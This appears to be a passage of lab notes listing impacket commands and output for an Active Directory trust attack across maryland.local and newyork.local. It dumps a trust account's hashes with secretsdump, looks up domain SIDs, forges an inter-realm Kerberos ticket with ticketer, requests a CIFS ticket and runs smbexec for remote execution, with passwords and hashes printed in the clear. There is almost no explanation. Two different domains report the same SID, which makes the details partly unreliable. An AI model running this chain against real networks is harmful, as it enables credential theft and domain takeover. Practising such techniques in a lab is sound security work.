Copy secretsdump.py -just-dc-user 'NEWYORK$' maryland.local/Carmelo.Anthony:'ballislife'@192.168.56.12
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
newyork$:1105:aad3b435b51404eeaad3b435b51404ee:3efc88864c2ab5cb43747ae949685db2:::
[*] Kerberos keys grabbed
newyork$:aes256-cts-hmac-sha1-96:67bff53c935e4ba7e695b7744a4707f27519f330a10ce9ce88b3df1c51062c33
newyork$:aes128-cts-hmac-sha1-96:1057280d1cc1152e3054558b5244f6d3
newyork$:des-cbc-md5:01a864762326161f
[*] Cleaning up...
Copy #newyork.local SID
lookupsid.py -domain-sids north.newyork.local/fernando.alonzo:'IDr1R3allyF@sTF1!'@192.168.56.10 0
[*] Brute forcing SIDs at 192.168.56.10
[*] StringBinding ncacn_np:192.168.56.10[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-620482180-1620433373-1814187987
#Maryland.local SID
lookupsid.py -domain-sids maryland.local/Carmelo.Anthony:'ballislife'@192.168.56.10 0
[*] Brute forcing SIDs at 192.168.56.10
[*] StringBinding ncacn_np:192.168.56.10[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-620482180-1620433373-1814187987
Copy ticketer.py -nthash 3efc88864c2ab5cb43747ae949685db2 \
-domain-sid S-1-5-21-620482180-1620433373-1814187987 \
-domain maryland.local \
-extra-sid S-1-5-21-620482180-1620433373-1814187987 \
-spn krbtgt/newyork.local ballislife
Copy export KRB5CCNAME=/home/jefe/delegation/ballislife.ccache
getST.py -k -no-pass -spn cifs/nyc.newyork.local \
newyork.local/ballislife@newyork.local -debug
Copy export KRB5CCNAME=/workspace/trusts/external/ballislife@newyork.local.ccache
smbexec.py -k -no-pass ballislife@nyc.newyork.local -debug
klist